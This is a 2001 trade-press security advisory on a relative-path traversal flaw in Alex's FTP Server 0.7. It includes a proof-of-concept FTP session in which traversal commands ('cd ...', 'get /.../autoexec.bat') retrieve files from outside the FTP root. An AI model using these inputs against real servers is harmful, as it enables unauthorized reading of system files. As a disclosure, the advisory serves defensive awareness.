Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
Alex FTP Server Relative Path Vulnerability
A vulnerability exists that lets an attacker break out of an FTP root. For example, an attacker can access the root directory where the FTP server is running by connecting to a vulnerable host and issuing the command cd ...
Ken Pfeil
April 29, 2001
3 Min Read
Reported April 28, 2001, by JoeTesta.
VERSION AFFECTED
Alex’s FTP Server 0.7 for Windows 2000, Windows NT, and Windows 9x
DESCRIPTION
Avulnerability exists that lets an attacker break out of an FTP root. Forexample, an attacker can access the root directory where the FTP server isrunning by connecting to a vulnerable host and issuing the command cd … Anattacker can also use relative paths to download files outside of an FTP root.
DEMONSTRATION
Joe Testa provided the followingproof-of-concept scenario:
The following is anillustration of the problem. An ftproot of
'c:directorydirectory' wasused:
Connected toxxxxxxxxxx.rh.rit.edu.
220 xxxxxxxxxx FTP version 0.7ready at Fri Apr 20 23:17:32 2001
User (xxxxxxxxxx.rh.rit.edu:(none)):jdog
331 Enter PASS command
Password:
230 Logged in
ftp> get /.../autoexec.bat
200 Port command okay
150 Opening data connectionfor retr "/.../autoexec.bat"
226 Transfer complete
ftp: 411 bytes received in0.00Seconds 411000.00Kbytes/sec.
ftp> cd ...
257 "/.../" iscurrent directory
ftp> get command.com
200 Port command okay
150 Opening data connectionfor retr "/.../command.com"
226 Transfer complete
ftp: 85 bytes received in0.00Seconds 85000.00Kbytes/sec.
ftp>
VENDOR RESPONSE
Thevendor, Alex Linde, has been notified.However, no workaround or fix is currently available.
CREDIT
Discovered by JoeTesta.
About the Author(s)
You May Also Like
